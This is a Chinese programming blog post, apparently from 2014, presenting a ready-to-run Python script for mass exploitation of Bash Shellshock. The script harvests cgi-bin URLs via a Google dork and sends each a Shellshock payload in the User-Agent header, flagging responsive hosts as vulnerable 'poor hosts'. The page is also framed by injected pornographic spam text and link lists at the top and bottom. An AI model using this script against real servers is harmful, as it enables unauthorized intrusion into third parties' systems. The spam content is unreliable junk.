多多色-多人伦交性欧美在线观看-多人伦精品一区二区三区视频-多色视频-免费黄色视屏网站-免费黄色在线

國內(nèi)最全I(xiàn)T社區(qū)平臺 聯(lián)系我們 | 收藏本站
阿里云優(yōu)惠2
您當(dāng)前位置:首頁 > php開源 > Bash Shellshock(Bash遠(yuǎn)程代碼執(zhí)行)漏洞批量利用腳本

Bash Shellshock(Bash遠(yuǎn)程代碼執(zhí)行)漏洞批量利用腳本

來源:程序員人生   發(fā)布時(shí)間:2014-10-12 18:14:12 閱讀次數(shù):3404次
Bash遠(yuǎn)程代碼執(zhí)行漏洞的威力確實(shí)要比心臟滴血大很多,但是影響范圍不是很廣泛,不過昨天的分析文章Bash遠(yuǎn)程代碼執(zhí)行漏洞分析中末尾提到了這個(gè)漏洞的批量問題。
其中最最簡單的方法就是使用搜索引擎的hacking技術(shù),這里我使用的Google Hacking語法結(jié)合Google API來進(jìn)行鏈接的抓取。只不過在國內(nèi)的話。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何檢測漏洞思路也很簡單,我這里直接根據(jù)服務(wù)器返回碼進(jìn)行判斷的。

思路就是以上這些,下面還是和往常一樣,貼代碼:

#coding=utf-8 import requests import json import sys import threading import socket vul_res = [] class GoogleURLProvider(): def __init__(self,pageCount,proxies): self.pageCount = pageCount #查詢的頁數(shù) self.keywords = r'inurl:cgi-bin filetype:sh' self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web" self.proxies = proxies def getRequest(self,url): return requests.get(url,proxies=self.proxies,verify=False) def getUrls(self): ret_list = [] tmp_list = [] for x in xrange(0,self.pageCount): url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x) try: r = self.getRequest(url) results = json.loads(r.text) if not results: continue infos = results['responseData']['results'] if infos: for i in infos: tmp_list.append(i['url']) except Exception, e: continue ret_list = ret_list + tmp_list return ret_list class BashRCEDetector(): def __init__(self,urls): self.urls = urls def detector(self): global vul_res for x in self.urls: #多線程執(zhí)行 each = EachWorker(x) each.start() each.join() '''線程工作類''' class EachWorker(threading.Thread): def __init__(self,url): threading.Thread.__init__(self) self.url = url def run(self): global vul_res useragent_header = { 'User-Agent':'''() { 1;}; echo 'eee''' } try: r = requests.get(self.url,headers = useragent_header,timeout=8) if r.status_code == 500: print "{url} has Bash RCE vulnerability".format(url=self.url) vul_res.append(self.url) else: pass except socket.timeout, e: pass except requests.exceptions.Timeout, e: pass except requests.exceptions.ConnectionError, e: pass if __name__ == '__main__': print 'Powered by:Exploit QQ:739858341' print 'This is a program which you can use to scan the BashRCE vulnerability Scanner working,please wait....' if len(sys.argv) != 2: print 'Usage:python BashRCEScanner <google pageCount>' sys.exit() #goagent proxy #在這里修改,加入你自己的代理即可使用 proxies = { 'http':"http://127.0.0.1:8087", 'https':"http://127.0.0.1:8087" } url_res = [] vul_guys = [] urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies) url_res = urlgetter.getUrls() bash_detector = BashRCEDetector(url_res) bash_detector.detector() if len(vul_res) == 0: print 'This group have no vulnerability' else: print 'Find %d poor host(s)' % len(vul_res)


運(yùn)行截圖:



生活不易,碼農(nóng)辛苦
如果您覺得本網(wǎng)站對您的學(xué)習(xí)有所幫助,可以手機(jī)掃描二維碼進(jìn)行捐贈(zèng)
程序員人生
------分隔線----------------------------
分享到:
------分隔線----------------------------
關(guān)閉
程序員人生
主站蜘蛛池模板: 久久五月网| 福利片午夜 | 国产精品久久毛片 | 波多野结衣在线免费视频 | 欧美a在线看 | 欧美第六页 | 亚洲视频福利 | 亚洲天堂视频网站 | 一本一道久久综合狠狠老 | 久久亚洲人成国产精品 | 免费观看视频网站 | 一级做a爰片性色毛片新版的 | 毛片资源站 | 日本免费中文字幕 | 免费a级作爱片免费观看中 免费a网站 | 美女毛片网站 | 女bbbbxxxx另类亚洲 | 欧美一区二区三区成人看不卡 | 一本久道久久综合婷婷五 | 亚洲a级毛片 | 欧美日韩高清观看一区二区 | 最近的中文字幕 | 国产一区二区免费播放 | 久久精品中文字幕不卡一二区 | 一级做a爰片欧美一区 | 性综合网| 91欧美一区二区三区综合在线 | 国产精品久久久久久久久久久不卡 | 国产手机在线看片 | 99爱精品 | 最好看的最新中文字幕2018免费视频 | 日韩综合久久 | 青青青青在线成人视99 | 国产在线观看精品一区二区三区91 | 国产毛片片精品天天看视频 | 成人亚州 | 性欧美xxxx视频在线观看 | 国产人成精品午夜在线观看 | 国内精品视频在线观看 | 欧美另类xxx | 欧美国产亚洲精品高清不卡 |